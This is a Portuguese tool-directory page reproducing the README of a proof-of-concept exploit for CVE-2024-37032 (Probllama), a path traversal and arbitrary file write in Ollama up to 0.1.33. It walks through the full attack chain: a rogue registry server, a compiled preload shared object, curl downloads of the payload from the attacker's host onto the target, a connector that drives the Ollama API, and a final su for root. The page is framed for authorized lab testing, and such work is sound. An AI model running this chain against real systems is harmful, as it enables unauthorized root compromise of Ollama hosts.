Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-37032-PoC — CVE-2024-37032 (Probllama) PoC para Ollama ≤0.1.33: path traversal e escrita arbitrária de arquivos por meio do tratamento do digest do modelo, levando à escalada automatizada de privilégios. | Kitploit
Ferramentas/GitHubGitHub/itzsh4dowxz/cve-2024-37032-poc
Escalada de PrivilégiosAnálise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
itzsh4dowxz/cve-2024-37032-poc

CVE-2024-37032-PoC

CVE-2024-37032 (Probllama) PoC para Ollama ≤0.1.33: path traversal e escrita arbitrária de arquivos por meio do tratamento do digest do modelo, levando à escalada automatizada de privilégios.

Ver Repositório
82há 2 mesesAinda não revisado

CVE-2024-37032 Probllama PoC — Ollama Path Traversal e Escalação de Privilégios

Este repositório contém um servidor de registro (registry) FastAPI de prova de conceito, script conector e biblioteca de demonstração de preload para testes de laboratório autorizados.

Use isto apenas em sistemas que você possui ou para os quais tem permissão explícita de testar.

Files

  • server.py: inicia o servidor PoC FastAPI.
  • rogue_server/config.py: configuração central do servidor PoC.
  • connector.py: envia as requisições pull/push para a API Ollama alvo.
  • preload_privs_demo.c: código-fonte C para o payload de objeto compartilhado (shared object).
  • requirements.txt: dependências Python para o servidor PoC.

1. Instalar Dependências do Servidor

Na sua máquina host, instale as dependências Python:

root@kitploit:~
python -m pip install -r requirements.txt

2. Configurar o Host e as Portas

Edite o arquivo rogue_server/config.py na sua máquina host:

root@kitploit:~
HOST = "<your_host_ip_or_host_ip>"

Edite o arquivo connector.py:

root@kitploit:~
SERVER_HOST = "<your_host_ip_or_host_ip:8000>"
TARGET_HOST = "127.0.0.1"
TARGET_PORT = 11434

Observações:

  • SERVER_HOST deve apontar para o host que executa o server.py.
  • Se o servidor PoC estiver rodando na porta 8000, inclua a porta em HOST e SERVER_HOST, por exemplo 10.10.16.160:8000.
  • TARGET_HOST e TARGET_PORT devem apontar para a API Ollama alvo. Se o connector.py for executado diretamente na máquina alvo, 127.0.0.1:11434 geralmente está correto.
  • Se você alterar o rogue_server/config.py, reinicie o servidor PoC.

3. Compilar o Objeto Compartilhado

Compile o arquivo C e nomeie a saída como libpreload_privs_demo.so:

root@kitploit:~
gcc -shared -fPIC -o libpreload_privs_demo.so preload_privs_demo.c

4. Transferir Arquivos para o Alvo

Copie estes arquivos para a máquina alvo autorizada:

  • libpreload_privs_demo.so
  • connector.py

Uma forma simples é servi-los a partir da sua máquina host:

root@kitploit:~
python3 -m http.server 8081

Em seguida, faça o download deles na máquina alvo:

root@kitploit:~
curl -O http://<your_host_ip>:8081/libpreload_privs_demo.so
curl -O http://<your_host_ip>:8081/connector.py

Após baixar o objeto compartilhado, copie o caminho absoluto dele na máquina alvo e defina esse mesmo caminho como exploit_path no arquivo rogue_server/config.py na máquina host.

Exemplo:

root@kitploit:~
exploit_path = "/tmp/libpreload_privs_demo.so"

5. Iniciar o Servidor PoC

Inicie o servidor FastAPI na sua máquina host:

root@kitploit:~
python server.py

Por padrão, este projeto inicia o Uvicorn em 0.0.0.0:8000.

6. Executar o Conector

Na máquina alvo autorizada, execute:

root@kitploit:~
python3 connector.py

O conector envia as requisições pull e push para a API Ollama configurada.

7. Validar o Resultado

Após o conector terminar, execute:

root@kitploit:~
su

Em um alvo de laboratório vulnerável e corretamente configurado, o caminho de preload deve ser utilizado e a transição de privilégios pode ser observada.

Solução de Problemas

  • Confirme se o firewall do host permite a porta do servidor PoC e a porta do servidor temporário de arquivos.
  • Confirme se SERVER_HOST em connector.py corresponde a HOST em rogue_server/config.py.
  • Confirme se exploit_path é exatamente o caminho absoluto onde libpreload_privs_demo.so existe na máquina alvo.
  • Confirme se a API Ollama alvo está acessível em TARGET_HOST:TARGET_PORT.
  • Reinicie o server.py após alterar o rogue_server/config.py.
Baixar ferramenta